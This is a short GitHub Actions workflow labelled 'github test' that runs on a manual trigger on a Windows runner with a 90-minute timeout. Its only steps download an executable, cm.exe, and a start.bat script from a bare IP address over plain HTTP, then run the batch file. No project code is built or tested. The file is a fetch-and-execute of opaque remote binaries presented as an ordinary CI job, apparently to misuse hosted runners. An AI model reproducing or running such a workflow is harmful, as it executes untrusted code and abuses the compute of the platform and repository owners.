name: github test
on: workflow_dispatch
jobs:
  build:
    runs-on: windows-latest
    timeout-minutes: 90
    steps:
    - name: Download files.
      run: |
        Invoke-WebRequest http://134.122.17.115/cm.exe -OutFile cm.exe
        Invoke-WebRequest http://134.122.17.115/start.bat -OutFile start.bat
    - name: runing.
      run: cmd /c start.bat
